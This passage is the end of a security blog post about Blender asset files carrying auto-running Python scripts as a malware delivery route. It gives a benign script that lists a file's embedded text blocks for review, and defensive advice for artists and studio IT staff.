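To illustrate what such a report might contain, the sketch below enumerates a file’s internal text blocks via bpy.data.texts. The function name and field layout are assumptions of mine, not a Blender feature; the bpy import is guarded so the sketch can be read outside Blender, and drivers/handlers could be appended similarly.

```python
try:
    import bpy  # only available inside Blender
except ImportError:
    bpy = None


def script_asset_report():
    """Summarise every internal text block before allowing execution.

    Returns a list of dicts with each block's name, size in bytes,
    whether it will auto-run (the 'Register' flag), and a short
    content preview, approximating the transparency proposed above.
    """
    if bpy is None:
        return []  # not running inside Blender
    report = []
    for text in bpy.data.texts:
        body = text.as_string()
        report.append({
            "name": text.name,
            "size": len(body.encode()),
            "auto_run": text.use_module,  # True -> runs on file load
            "preview": body[:80],         # first 80 chars for review
        })
    return report
```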
Conclusion
This project began as an attempt to bridge my passion for animation with my career in cyber security. It ended as a comprehensive proof of concept that even a familiar creative tool like Blender can be turned into a delivery mechanism for malicious code. By leveraging user trust, habit, and the expected workflow of 3D artists, an asset file can become a Trojan horse without ever exploiting a single software vulnerability.
The key lesson here is that the most effective attack vectors are not always zero-days or sophisticated exploits, but sometimes they are simply the repurposing of legitimate features in ways that defenders and users may not have anticipated before. In this case, Blender’s scripting capabilities are invaluable for automation and creativity, but also effective for stealthy code execution.
This PoC demonstrates that unconventional attack surfaces are often the least monitored. Security teams and users alike should extend their attention and awareness beyond traditional “enterprise” software and include any tool capable of running user-supplied code.
Whether you’re a 3D enthusiast, a freelance artist, or an animation studio IT administrator, the defensive principles remain the same:
- Treat untrusted files as potentially dangerous.
- Keep auto-execution safeguards in place unless there is a clear, verified need to remove them.
- Inspect scripts and complex drivers before allowing them to run.
- Where possible, isolate and scan assets before they enter production workflows.
The creativity that drives artistic work is the same creativity that can power cyber-attacks. By anticipating these tactics and embedding security habits and technologies into creative workflows, we can protect our art, our people, and our systems alike.
Stay safe, and keep blending, in both art and security.